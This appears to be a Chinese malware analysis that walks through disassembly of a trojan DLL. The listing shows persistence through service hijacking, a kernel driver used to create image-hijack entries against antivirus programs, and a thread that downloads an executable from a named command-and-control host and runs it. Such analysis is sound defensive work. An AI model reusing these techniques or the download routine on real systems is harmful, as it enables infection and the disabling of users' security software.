- 003C4598 >pop ecx
- 003C4599 >and dword ptr [eax], 0
- 003C459C >and dword ptr [ebp-F44], 0
- 003C45A3 >jmp short 003C45B2
- 003C45A5 >mov eax, dword ptr [ebp-F44]
- 003C45AB >inc eax
- 003C45AC >mov dword ptr [ebp-F44], eax
- 003C45B2 >cmp dword ptr [ebp-F44], 12
- 003C45B9 >jge 003C4687
- 003C45BF >push dword ptr [ebp-F44]
- 003C45C5 >push 0
- 003C45C7 >push 40
- 003C45C9 >lea eax, dword ptr [ebp-F88]
- 003C45CF >push eax
- 003C45D0 >call 003C17AC
- 003C45D5 >push dword ptr [ebp-F44]
- 003C45DB >push 1
- 003C45DD >push 40
- 003C45DF >lea eax, dword ptr [ebp-FC8]
- 003C45E5 >push eax
- 003C45E6 >call 003C17AC
- 003C45EB >lea eax, dword ptr [ebp-FC8]
- 003C45F1 >push eax ; /String2
- 003C45F2 >lea eax, dword ptr [ebp-928] ; |
- 003C45F8 >push eax ; |String1
- 003C45F9 >call dword ptr [<&KERNEL32.lstrcmpiA>; /lstrcmpiA
- 003C45FF >test eax, eax
- 003C4601 >jnz short 003C4682
- 003C4603 >and dword ptr [ebp-FCC], 0
- 003C460A >mov dword ptr [ebp-FD0], 2
- 003C4614 >lea eax, dword ptr [ebp-F88]
- 003C461A >push eax ; /<%s>
- 003C461B >push dword ptr [3C6004] ; |<%s> = "SYSTEM/CurrentControlSet/Services"
- 003C4621 >push 003C534C ; |Format = "%s/%s"
- 003C4626 >lea eax, dword ptr [ebp-13D0] ; |
- 003C462C >push eax ; |s
- 003C462D >call dword ptr [<&USER32.wsprintfA>] ; /wsprintfA
- 003C4633 >add esp, 10
- 003C4636 >lea eax, dword ptr [ebp-FCC]
- 003C463C >push eax ; /pHandle
- 003C463D >push 2001F ; |Access = KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|20000
- 003C4642 >push 0 ; |Reserved = 0
- 003C4644 >lea eax, dword ptr [ebp-13D0] ; |
- 003C464A >push eax ; |Subkey
- 003C464B >push 80000002 ; |hKey = HKEY_LOCAL_MACHINE
- 003C4650 >call dword ptr [<&ADVAPI32.RegOpenKe>; /RegOpenKeyExA
- 003C4656 >push 4 ; /BufSize = 4
- 003C4658 >lea eax, dword ptr [ebp-FD0] ; |
- 003C465E >push eax ; |Buffer
- 003C465F >push 4 ; |ValueType = REG_DWORD
- 003C4661 >push 0 ; |Reserved = 0
- 003C4663 >push 003C566C ; |ValueName = "Start"
- 003C4668 >push dword ptr [ebp-FCC] ; |hKey
- 003C466E >call dword ptr [<&ADVAPI32.RegSetVal>; /RegSetValueExA 003C4550-003C4687:取自身文件名(去掉扩展名),与用003C17AC解密出的18个ServiceDll名逐个比较(与call 1中的服务名表逻辑相同),找到自身对应的被劫持服务后把HKLM\SYSTEM\CurrentControlSet\Services\<服务名>\Start设为2(SERVICE_AUTO_START),保证开机自启
- 003C4674 >push dword ptr [ebp-FCC] ; /hKey
- 003C467A >call dword ptr [<&ADVAPI32.RegCloseK>; /RegCloseKey
- 003C4680 >jmp short 003C4687
- 003C4682 >jmp 003C45A5
- 003C4687 >push 0 ; /hTemplateFile = NULL
- 003C4689 >push 80 ; |Attributes = NORMAL
- 003C468E >push 3 ; |Mode = OPEN_EXISTING
- 003C4690 >push 0 ; |pSecurity = NULL
- 003C4692 >push 1 ; |ShareMode = FILE_SHARE_READ
- 003C4694 >push C0000000 ; |Access = GENERIC_READ|GENERIC_WRITE
- 003C4699 >push 003C5674 ; |FileName = "//./Accopt"
- 003C469E >call dword ptr [<&KERNEL32.CreateFil>; /CreateFileA 打开驱动设备\\.\Accopt;打开失败(返回-1)则跳到003C48A2,只创建线程2
- 003C46A4 >mov dword ptr [ebp-10], eax
- 003C46A7 >cmp dword ptr [ebp-10], -1
- 003C46AB >jnz short 003C46B7
- 003C46AD >jmp 003C48A2
- 003C46B2 >jmp 003C48A2
- 003C46B7 >cmp dword ptr [ebp-4], 0
- 003C46BB >jnz 003C4755
- 003C46C1 >and dword ptr [ebp-14DC], 0
- 003C46C8 >and dword ptr [ebp-14E0], 0
- 003C46CF >push 104 ; /n = 104 (260.)
- 003C46D4 >push 0 ; |c = 00
- 003C46D6 >lea eax, dword ptr [ebp-14D8] ; |
- 003C46DC >push eax ; |s
- 003C46DD >call <jmp.&MSVCRT.memset> ; /memset
- 003C46E2 >add esp, 0C
- 003C46E5 >lea eax, dword ptr [ebp-14D8]
- 003C46EB >push eax
- 003C46EC >call 003C10A6
- 003C46F1 >mov dword ptr [ebp-14DC], eax
- 003C46F7 >lea eax, dword ptr [ebp-14D8]
- 003C46FD >push eax ; /FileName
- 003C46FE >call dword ptr [<&KERNEL32.LoadLibra>; /LoadLibraryA
- 003C4704 >mov dword ptr [ebp-14E0], eax
- 003C470A >push 003C5680 ; /ProcNameOrOrdinal = "MmGetSystemRoutineAddress"
- 003C470F >push dword ptr [ebp-14E0] ; |hModule
- 003C4715 >call dword ptr [<&KERNEL32.GetProcAd>; /GetProcAddress
- 003C471B >mov ecx, dword ptr [ebp-14DC]
- 003C4721 >sub ecx, dword ptr [ebp-14E0]
- 003C4727 >add eax, ecx
- 003C4729 >mov dword ptr [ebp-4], eax 计算内核中MmGetSystemRoutineAddress的地址:call 003C10A6返回内核映像路径并给出其内核基址(推测),再把同一文件用LoadLibraryA映射到用户态,GetProcAddress得到的用户态地址减去用户态基址即RVA,加上内核基址得到内核态地址。该地址随后通过IOCTL 0x222193交给驱动,驱动借此解析其它内核例程——这是驱动不经导入表获取内核API的典型手法
- 003C472C >push dword ptr [ebp-14E0] ; /hLibModule
- 003C4732 >call dword ptr [<&KERNEL32.FreeLibra>; /FreeLibrary
- 003C4738 >cmp dword ptr [ebp-4], 0
- 003C473C >jnz short 003C4755
- 003C473E >push dword ptr [ebp-10] ; /hObject
- 003C4741 >call dword ptr [<&KERNEL32.CloseHand>; /CloseHandle
- 003C4747 >or dword ptr [ebp-10], FFFFFFFF
- 003C474B >jmp 003C48A2
- 003C4750 >jmp 003C48A2
- 003C4755 >mov eax, dword ptr [ebp-4]
- 003C4758 >mov dword ptr [ebp-1C], eax
- 003C475B >push 0 ; /pOverlapped = NULL
- 003C475D >lea eax, dword ptr [ebp-14] ; |
- 003C4760 >push eax ; |pBytesReturned
- 003C4761 >push 4 ; |OutBufferSize = 4
- 003C4763 >lea eax, dword ptr [ebp-20] ; |
- 003C4766 >push eax ; |OutBuffer
- 003C4767 >push 4 ; |InBufferSize = 4
- 003C4769 >lea eax, dword ptr [ebp-1C] ; |
- 003C476C >push eax ; |InBuffer
- 003C476D >push 222193 ; |IoControlCode = 222193
- 003C4772 >push dword ptr [ebp-10] ; |hDevice
- 003C4775 >call dword ptr [<&KERNEL32.DeviceIoC>; /DeviceIoControl 把MmGetSystemRoutineAddress的内核地址(InBuffer,4字节)传给驱动,驱动回写4字节到[ebp-20]
- 003C477B >cmp dword ptr [3C6054], 0
- 003C4782 >je short 003C47C8
- 003C4784 >mov eax, dword ptr [ebp-1C]
- 003C4787 >cmp eax, dword ptr [ebp-4]
- 003C478A >je short 003C47C8
- 003C478C >cmp dword ptr [ebp-20], 0
- 003C4790 >je short 003C47C8
- 003C4792 >lea eax, dword ptr [ebp-1DA0]
- 003C4798 >push eax
- 003C4799 >push dword ptr [ebp-1C]
- 003C479C >push dword ptr [ebp-20]
- 003C479F >call 003C1151
- 003C47A4 >push 0 ; /pOverlapped = NULL
- 003C47A6 >lea eax, dword ptr [ebp-14] ; |
- 003C47A9 >push eax ; |pBytesReturned
- 003C47AA >push 8C0 ; |OutBufferSize = 8C0 (2240.)
- 003C47AF >lea eax, dword ptr [ebp-1DA0] ; |
- 003C47B5 >push eax ; |OutBuffer
- 003C47B6 >push 0 ; |InBufferSize = 0
- 003C47B8 >push 0 ; |InBuffer = NULL
- 003C47BA >push 22221F ; |IoControlCode = 22221F
- 003C47BF >push dword ptr [ebp-10] ; |hDevice
- 003C47C2 >call dword ptr [<&KERNEL32.DeviceIoC>; /DeviceIoControl 输出缓冲0x8C0字节;仅当3C6054非零、且驱动回写值与传入值不同时才走到这里,先由call 003C1151用两者填充缓冲再发送,具体含义需结合驱动分析
- 003C47C8 >mov dword ptr [ebp-8], 003C6350
- 003C47CF >mov eax, dword ptr [ebp-8]
- 003C47D2 >movsx eax, byte ptr [eax]
- 003C47D5 >test eax, eax
- 003C47D7 >je 003C489A
- 003C47DD >push 400 ; /n = 400 (1024.)
- 003C47E2 >push 0 ; |c = 00
- 003C47E4 >lea eax, dword ptr [ebp-F40] ; |
- 003C47EA >push eax ; |s
- 003C47EB >call <jmp.&MSVCRT.memset> ; /memset
- 003C47F0 >add esp, 0C
- 003C47F3 >push dword ptr [ebp-8] ; /<%s>
- 003C47F6 >push dword ptr [3C6008] ; |<%s> = "SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options"
- 003C47FC >push dword ptr [3C6000] ; |<%s> = "/Registry/Machine"
- 003C4802 >push 003C569C ; |Format = "%s/%s/%s"
- 003C4807 >lea eax, dword ptr [ebp-F40] ; |
- 003C480D >push eax ; |s
- 003C480E >call dword ptr [<&USER32.wsprintfA>] ; /wsprintfA
- 003C4814 >add esp, 14
- 003C4817 >lea eax, dword ptr [ebp-F40]
- 003C481D >push eax ; /String
- 003C481E >call dword ptr [<&KERNEL32.lstrlenA>>; /lstrlenA
- 003C4824 >mov dword ptr [ebp-18], eax
- 003C4827 >push 800 ; /n = 800 (2048.)
- 003C482C >push 0 ; |c = 00
- 003C482E >lea eax, dword ptr [ebp-820] ; |
- 003C4834 >push eax ; |s
- 003C4835 >call <jmp.&MSVCRT.memset> ; /memset
- 003C483A >add esp, 0C
- 003C483D >push dword ptr [ebp-18] ; /WideBufSize
- 003C4840 >lea eax, dword ptr [ebp-820] ; |
- 003C4846 >push eax ; |WideCharBuf
- 003C4847 >push dword ptr [ebp-18] ; |StringSize
- 003C484A >lea eax, dword ptr [ebp-F40] ; |
- 003C4850 >push eax ; |StringToMap
- 003C4851 >push 0 ; |Options = 0
- 003C4853 >push 0 ; |CodePage = CP_ACP
- 003C4855 >call dword ptr [<&KERNEL32.MultiByte>; /MultiByteToWideChar
- 003C485B >push 0 ; /pOverlapped = NULL
- 003C485D >lea eax, dword ptr [ebp-14] ; |
- 003C4860 >push eax ; |pBytesReturned
- 003C4861 >push 0 ; |OutBufferSize = 0
- 003C4863 >push 0 ; |OutBuffer = NULL
- 003C4865 >mov eax, dword ptr [ebp-18] ; |
- 003C4868 >lea eax, dword ptr [eax+eax+2] ; |
- 003C486C >push eax ; |InBufferSize
- 003C486D >lea eax, dword ptr [ebp-820] ; |
- 003C4873 >push eax ; |InBuffer
- 003C4874 >push 22245C ; |IoControlCode = 22245C
- 003C4879 >push dword ptr [ebp-10] ; |hDevice
- 003C487C >call dword ptr [<&KERNEL32.DeviceIoC>; /DeviceIoControl 输入为UNICODE路径"\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\<杀软进程名>"(内核对象路径格式),InBufferSize=2*len+2含结尾NUL;对003C6350表中每个杀软进程名各发一次,由驱动在内核态创建IFEO项实现镜像劫持,从而绕过用户态对该注册表路径的监控
- 003C4882 >push dword ptr [ebp-8] ; /String
- 003C4885 >call dword ptr [<&KERNEL32.lstrlenA>>; /lstrlenA
- 003C488B >mov ecx, dword ptr [ebp-8]
- 003C488E >lea eax, dword ptr [ecx+eax+1]
- 003C4892 >mov dword ptr [ebp-8], eax
- 003C4895 >jmp 003C47CF
- 003C489A >push dword ptr [ebp-10]
- 003C489D >call 003C42BA
- 003C48A2 >push 0 ; /pThreadId = NULL
- 003C48A4 >push 0 ; |CreationFlags = 0
- 003C48A6 >push 0 ; |pThreadParm = NULL
- 003C48A8 >push 003C27B7 ; |ThreadFunction = appmgmts.003C27B7
- 003C48AD >push 0 ; |StackSize = 0
- 003C48AF >push 0 ; |pSecurity = NULL
- 003C48B1 >call dword ptr [<&KERNEL32.CreateThr>; /CreateThread 创建线程2
- 003C48B7 >cmp dword ptr [ebp-10], -1
- 003C48BB >je short 003C48D7
- 003C48BD >xor eax, eax
- 003C48BF >inc eax
- 003C48C0 >je short 003C48D7
- 003C48C2 >push dword ptr [ebp-10]
- 003C48C5 >call 003C42BA 每1500ms(0x5DC)用设备句柄调用003C42BA一次(003C489A处也调用了一次);003C48BD-003C48C0的xor/inc/je使je永不成立,这是一个死循环。003C42BA的内容未展示,"检测服务是否启动并重启"属于推测;IFEO镜像劫持在上面003C47C8的循环中已经完成
- 003C48CA >push 5DC
- 003C48CF >call dword ptr [ebp-92C] sleep函数
- 003C48D5 >jmp short 003C48BD
- 003C48D7 >xor eax, eax
- 003C48D9 >leave
- 003C48DA >retn 4
总体流程结束
------------------------------------------------------------------
进入线程 2,代码如下:
- 003C27B7 >push ebp
- 003C27B8 >mov ebp, esp
- 003C27BA >sub esp, 90
- 003C27C0 >and dword ptr [ebp-20], 0
- 003C27C4 >and dword ptr [ebp-1C], 0
- 003C27C8 >and dword ptr [ebp-14], 0
- 003C27CC >and dword ptr [ebp-C], 0
- 003C27D0 >and dword ptr [ebp-18], 0
- 003C27D4 >and dword ptr [ebp-8], 0
- 003C27D8 >and dword ptr [ebp-64], 0
- 003C27DC >and dword ptr [ebp-10], 0
- 003C27E0 >and dword ptr [ebp-4], 0
- 003C27E4 >push 003C5474 ; /FileName = "urlmon.dll" 加载urlmon.dll模块
- 003C27E9 >call dword ptr [<&KERNEL32.LoadLibra>; /LoadLibraryA
- 003C27EF >mov dword ptr [ebp-64], eax
- 003C27F2 >push 003C5480 ; /ProcNameOrOrdinal = "URLDownloadToFileA" 获取该函数地址
- 003C27F7 >push dword ptr [ebp-64] ; |hModule
- 003C27FA >call dword ptr [<&KERNEL32.GetProcAd>; /GetProcAddress
- 003C2800 >mov dword ptr [3C7584], eax
- 003C2805 >push 003C5494 ; /FileName = "Wininet.dll"
- 003C280A >call dword ptr [<&KERNEL32.LoadLibra>; /LoadLibraryA
- 003C2810 >mov dword ptr [ebp-10], eax
- 003C2813 >push 003C54A0 ; /ProcNameOrOrdinal = "GetUrlCacheEntryInfoA"
- 003C2818 >push dword ptr [ebp-10] ; |hModule
- 003C281B >call dword ptr [<&KERNEL32.GetProcAd>; /GetProcAddress
- 003C2821 >mov dword ptr [ebp-4], eax
- 003C2824 >push 0
- 003C2826 >push dword ptr [3C600C]
- 003C282C >push 200
- 003C2831 >push 003C6058 ; ASCII "up.nba1001.com"
- 003C2836 >call <enstr> 字符串就地变换函数(作者命名为enstr,密钥取自3C600C);此处取得C2主机名up.nba1001.com,下面两次分别处理URL路径"down"和文件名前缀"02"。OllyDbg在调用前已显示明文,说明变换可能是可逆的异或且此时已被解过一次,以运行时实际值为准
- 003C283B >push 0
- 003C283D >push dword ptr [3C600C]
- 003C2843 >push 30
- 003C2845 >push 003C625C ; ASCII "down"
- 003C284A >call <enstr>
- 003C284F >push 0
- 003C2851 >push dword ptr [3C600C]
- 003C2857 >push 5C
- 003C2859 >push 003C6290 ; UNICODE "02"
- 003C285E >call <enstr>
- 003C2863 >call 003C2742
- 003C2868 >push 003C54B8 ; ASCII "Explorer.exe"
- 003C286D >call <KillPro> 从后续用法看(返回值作为ProcessId传给OpenProcess,再OpenProcessToken取其令牌),该函数返回的是Explorer.exe的PID而不是结束它;dll此时运行在svchost中,取explorer令牌推测是为了以登录用户身份访问网络/IE缓存。"KillPro"是作者起的名字,需进入确认
- 003C2872 >mov dword ptr [ebp-C], eax
- 003C2875 >cmp dword ptr [ebp-C], 0
- 003C2879 >je short 003C28AD
- 003C287B >and dword ptr [ebp-68], 0
- 003C287F >push dword ptr [ebp-C] ; /ProcessId
- 003C2882 >push 0 ; |Inheritable = FALSE
- 003C2884 >push 400 ; |Access = QUERY_INFORMATION
- 003C2889 >call dword ptr [<&KERNEL32.OpenProce>; /OpenProcess
- 003C288F >mov dword ptr [ebp-68], eax
- 003C2892 >lea eax, dword ptr [ebp-8]
- 003C2895 >push eax ; /phToken
- 003C2896 >push 0F01FF ; |DesiredAccess = STANDARD_RIGHTS_REQUIRED|TOKEN_ASSIGN_PRIMARY|TOKEN_DUPLICATE|TOKEN_IMPERSONATE|TOKEN_QUERY|TOKEN_QUERY_SOURCE|TOKEN_ADJUST_PRIVILEGES|TOKEN_ADJUST_GROUPS|TOKEN_ADJUST_DEFAULT|100
- 003C289B >push dword ptr [ebp-68] ; |hProcess
- 003C289E >call dword ptr [<&ADVAPI32.OpenProce>; /OpenProcessToken
- 003C28A4 >push dword ptr [ebp-68] ; /hObject
- 003C28A7 >call dword ptr [<&KERNEL32.CloseHand>; /CloseHandle
- 003C28AD >mov dword ptr [ebp-20], 003C6290
- 003C28B4 >xor eax, eax
- 003C28B6 >inc eax
- 003C28B7 >je 003C2B2C
- 003C28BD >mov dword ptr [ebp-6C], 1
- 003C28C4 >push 40 ; /n = 40 (64.)
- 003C28C6 >push 0 ; |c = 00
- 003C28C8 >lea eax, dword ptr [ebp-60] ; |
- 003C28CB >push eax ; |s
- 003C28CC >call <jmp.&MSVCRT.memset> ; /memset
- 003C28D1 >add esp, 0C
- 003C28D4 >push 0
- 003C28D6 >push 40
- 003C28D8 >lea eax, dword ptr [ebp-60]
- 003C28DB >push eax
- 003C28DC >lea eax, dword ptr [ebp-14]
- 003C28DF >push eax
- 003C28E0 >lea eax, dword ptr [ebp-1C]
- 003C28E3 >push eax
- 003C28E4 >push 003C6058
- 003C28E9 >call 003C22F0 关键call 3,查看网络连接
- 003C28EE >test eax, eax
- 003C28F0 >jnz short 003C28F7
- 003C28F2 >jmp 003C2B2C
- 003C28F7 >mov eax, dword ptr [ebp-20]
- 003C28FA >movsx eax, byte ptr [eax]
- 003C28FD >test eax, eax
- 003C28FF >je 003C2B1F
- 003C2905 >and dword ptr [ebp-70], 0
- 003C2909 >push 400 ; /n = 400 (1024.)
- 003C290E >push 0 ; |c = 00
- 003C2910 >push 003C6E60 ; |s = appmgmts.003C6E60
- 003C2915 >call <jmp.&MSVCRT.memset> ; /memset
- 003C291A >add esp, 0C
- 003C291D >push 104 ; /n = 104 (260.)
- 003C2922 >push 0 ; |c = 00
- 003C2924 >push 003C7260 ; |s = appmgmts.003C7260
- 003C2929 >call <jmp.&MSVCRT.memset> ; /memset
- 003C292E >add esp, 0C
- 003C2931 >push dword ptr [ebp-20] ; /<%s>
- 003C2934 >push 003C625C ; |<%s> = "?掫h?
- 003C2939 >push dword ptr [3C6050] ; |<%d> = 1F90 (8080.)
- 003C293F >lea eax, dword ptr [ebp-60] ; |
- 003C2942 >push eax ; |<%s>
- 003C2943 >push 003C54C8 ; |Format = "http://%s:%d/%s/%s.exe"
- 003C2948 >push 003C6E60 ; |s = appmgmts.003C6E60
- 003C294D >call dword ptr [<&USER32.wsprintfA>] ; /wsprintfA 字符连接,得到下载链接
- 003C2953 >add esp, 18
- 003C2956 >call 003C176E 获得一个随机数字串
- 003C295B >push eax ; /<%d>
- 003C295C >push dword ptr [ebp-20] ; |<%s>
- 003C295F >push 003C7368 ; |<%s> = "C:/DOCUME~1/safe/LOCALS~1/Temp/"
- 003C2964 >push 003C54E0 ; |Format = "%s%s%d.exe"
- 003C2969 >push 003C7260 ; |s = appmgmts.003C7260
- 003C296E >call dword ptr [<&USER32.wsprintfA>] ; /wsprintfA 字符连接,得到下载到本地临时目录的文件名,本机是C:/LOCALS~1/Temp/01139.exe
- 003C2974 >add esp, 14
- 003C2977 >and dword ptr [ebp-74], 0
- 003C297B >jmp short 003C2984
- 003C297D >mov eax, dword ptr [ebp-74]
- 003C2980 >inc eax
- 003C2981 >mov dword ptr [ebp-74], eax
- 003C2984 >cmp dword ptr [ebp-74], 2
- 003C2988 >jge 003C2AE1
- 003C298E >and dword ptr [ebp-7C], 0
- 003C2992 >and dword ptr [ebp-80], 0
- 003C2996 >and dword ptr [ebp-78], 0
- 003C299A >push 0 ; /pThreadId = NULL
- 003C299C >push 0 ; |CreationFlags = 0
- 003C299E >push 0 ; |pThreadParm = NULL
- 003C29A0 >push 003C278F ; |ThreadFunction = appmgmts.003C278F
- 003C29A5 >push 0 ; |StackSize = 0
- 003C29A7 >push 0 ; |pSecurity = NULL
- 003C29A9 >call dword ptr [<&KERNEL32.CreateThr>; /CreateThread 创建线程3,下载病毒文件到临时目录。
- 003C29AF >mov dword ptr [ebp-80], eax
- 003C29B2 >push 1F40 ; /Timeout = 8000. ms
- 003C29B7 >push dword ptr [ebp-80] ; |hObject
- 003C29BA >call dword ptr [<&KERNEL32.WaitForSi>; /WaitForSingleObject
- 003C29C0 >mov dword ptr [ebp-78], eax
- 003C29C3 >cmp dword ptr [ebp-78], 102
- 003C29CA >jnz short 003C29D7
- 003C29CC >push 1 ; /ExitCode = 1
- 003C29CE >push dword ptr [ebp-80] ; |hThread
- 003C29D1 >call dword ptr [<&KERNEL32.Terminate>; /TerminateThread
- 003C29D7 >lea eax, dword ptr [ebp-7C]
- 003C29DA >push eax ; /pExitCode
- 003C29DB >push dword ptr [ebp-80] ; |hThread
- 003C29DE >call dword ptr [<&KERNEL32.GetExitCo>; /GetExitCodeThread
- 003C29E4 >push dword ptr [ebp-80] ; /hObject
- 003C29E7 >call dword ptr [<&KERNEL32.CloseHand>; /CloseHandle
- 003C29ED >cmp dword ptr [ebp-7C], 0
- 003C29F1 >jnz 003C2AB8
- 003C29F7 >and dword ptr [ebp-84], 0
- 003C29FE >lea eax, dword ptr [ebp-84]
- 003C2A04 >push eax
- 003C2A05 >push 0
- 003C2A07 >push 003C6E60
- 003C2A0C >call dword ptr [ebp-4]
- 003C2A0F >cmp dword ptr [ebp-84], 0
- 003C2A16 >je short 003C2A7B
- 003C2A18 >push dword ptr [ebp-84]
- 003C2A1E >call <jmp.&MSVCRT.operator new>
- 003C2A23 >pop ecx
- 003C2A24 >mov dword ptr [ebp-8C], eax
- 003C2A2A >mov eax, dword ptr [ebp-8C]
- 003C2A30 >mov dword ptr [ebp-88], eax
- 003C2A36 >lea eax, dword ptr [ebp-84]
- 003C2A3C >push eax
- 003C2A3D >push dword ptr [ebp-88]
- 003C2A43 >push 003C6E60
- 003C2A48 >call dword ptr [ebp-4]
- 003C2A4B >mov eax, dword ptr [ebp-88]
- 003C2A51 >push dword ptr [eax+8] ; /FileName
- 003C2A54 >call dword ptr [<&KERNEL32.DeleteFil>; /DeleteFileA
- 003C2A5A >cmp dword ptr [ebp-88], 0
- 003C2A61 >je short 003C2A7B
- 003C2A63 >mov eax, dword ptr [ebp-88]
- 003C2A69 >mov dword ptr [ebp-90], eax
- 003C2A6F >push dword ptr [ebp-90]
- 003C2A75 >call <jmp.&MSVCRT.operator delete>
- 003C2A7A >pop ecx
- 003C2A7B >push 003C7260
- 003C2A80 >call 003C26DA 创建C:/LOCALS~1/Temp/01139.exe文件
- 003C2A85 >cmp eax, 1
- 003C2A88 >jnz short 003C2AA6
- 003C2A8A >and dword ptr [ebp-18], 0
- 003C2A8E >mov dword ptr [ebp-70], 1
- 003C2A95 >push dword ptr [ebp-8]
- 003C2A98 >push 003C7260
- 003C2A9D >call 003C25F4 执行下载回来的文件01139.exe
- 003C2AA2 >jmp short 003C2AE1
- 003C2AA4 >jmp short 003C2AB8
- 003C2AA6 >mov eax, dword ptr [ebp-18]
- 003C2AA9 >inc eax
- 003C2AAA >mov dword ptr [ebp-18], eax
- 003C2AAD >push 003C7260 ; /FileName = ""
- 003C2AB2 >call dword ptr [<&KERNEL32.DeleteFil>; /DeleteFileA 删除C:/LOCALS~1/Temp/01139.exe文件
- 003C2AB8 >cmp dword ptr [ebp-7C], 800C0006
- 003C2ABF >jnz short 003C2AD1
- 003C2AC1 >mov dword ptr [ebp-70], 1
- 003C2AC8 >mov eax, dword ptr [ebp-18]
- 003C2ACB >inc eax
- 003C2ACC >mov dword ptr [ebp-18], eax
- 003C2ACF >jmp short 003C2AE1
- 003C2AD1 >push 0BB8 ; /Timeout = 3000. ms
- 003C2AD6 >call dword ptr [<&KERNEL32.Sleep>] ; /Sleep
- 003C2ADC >jmp 003C297D
- 003C2AE1 >cmp dword ptr [ebp-18], 3
- 003C2AE5 >jb short 003C2AF0
- 003C2AE7 >mov dword ptr [ebp-6C], 1
- 003C2AEE >jmp short 003C2B1F
- 003C2AF0 >cmp dword ptr [ebp-70], 0
- 003C2AF4 >jnz short 003C2AFC
- 003C2AF6 >and dword ptr [ebp-6C], 0
- 003C2AFA >jmp short 003C2B1F
- 003C2AFC >push dword ptr [ebp-20] ; /String
- 003C2AFF >call dword ptr [<&KERNEL32.lstrlenA>>; /lstrlenA
- 003C2B05 >mov ecx, dword ptr [ebp-20]
- 003C2B08 >lea eax, dword ptr [ecx+eax+1]
- 003C2B0C >mov dword ptr [ebp-20], eax
- 003C2B0F >push 1F40 ; /Timeout = 8000. ms
- 003C2B14 >call dword ptr [<&KERNEL32.Sleep>] ; /Sleep
- 003C2B1A >jmp 003C28F7
- 003C2B1F >cmp dword ptr [ebp-6C], 1
- 003C2B23 >jnz short 003C2B27
- 003C2B25 >jmp short 003C2B2C
- 003C2B27 >jmp 003C28B4
- 003C2B2C >push dword ptr [ebp-64] ; /hLibModule
- 003C2B2F >call dword ptr [<&KERNEL32.FreeLibra>; /FreeLibrary
- 003C2B35 >xor eax, eax
- 003C2B37 >leave
- 003C2B38 >retn 4
-----------------
进入线程3,代码如下:
- 003C278F />push ebp ; Thread 3 entry (the ThreadFunction handed to CreateThread): one stack arg (retn 4), no other inputs
- 003C2790 |>mov ebp, esp
- 003C2792 |>push ecx ; reserves one dword of stack for [local.1]
- 003C2793 |>and [local.1], 0 ; local.1 = 0 (holds the call result)
- 003C2797 |>push 0 ; lpfnCB = NULL (no status callback)
- 003C2799 |>push 0 ; dwReserved = 0
- 003C279B |>push 003C7260 ; ASCII "C:/DOCUME~1/safe/LOCALS~1/Temp/01139.exe" ; szFileName: destination in %TEMP%, built by the caller with wsprintfA "%s%s%d.exe"
- 003C27A0 |>push 003C6E60 ; ASCII "http://67.159.35.85:8080/down/0.exe" ; szURL: built by the caller with wsprintfA "http://%s:%d/%s/%s.exe" (host string decoded by <enstr>)
- 003C27A5 |>push 0 ; pCaller = NULL
- 003C27A7 |>call dword ptr [3C7584] ; urlmon.URLDownloadToFileA — resolved through a pointer stored at 3C7584, not the import table; writes the file to the temp path, HRESULT in eax
- 003C27AD |>mov [local.1], eax ; keep the HRESULT
- 003C27B0 |>mov eax, [local.1] ; thread exit code = HRESULT; the caller reads it with GetExitCodeThread and tests for 0 (success) and 800C0006
- 003C27B3 |>leave
- 003C27B4 />retn 4
总结下流程:
1,比较模块基址和3C0000h,用于判断自身是exe还是dll文件。
2,是exe,创建C:/IOSYS.ini配置文件,加载sfc.dll,获得去除文件保护属性的导出函数地址,感染C:/WINDOWS/system32/appmgmts.dll,
qmgr.dll,检查文件appmgmts.dll是否存在,若不存在,则创建C:/System32/appmgmts.dll。若找到appmgmts.dll,则去掉该文件保护属性,
释放病毒动态链接库并命名为appmgmts.dll,替换系统正常文件%SystemRoot%/System32/appmgmts.dll。并替换文件
C:/system32/dllcache/appmgmts.dll.
3,启动"AppMgmt"服务,通过该服务加载C:/System32/appmgmts.dll。
4,读取C:/IOSYS.ini配置文件病毒路径,删除病毒主体。
5,创建线程,创建一个名为Accopt的服务,并加载。检测进程avp.exe等安全软件是否存在,如果找到,将其终止,并恢复SSDT。
6,创建线程,访问目标网址,下载大量病毒到本地运行。
7,不断循环检测服务是否启动,如果服务被关闭,则启动。并对绝大多数杀毒软件作镜像劫持。
可爱的结束符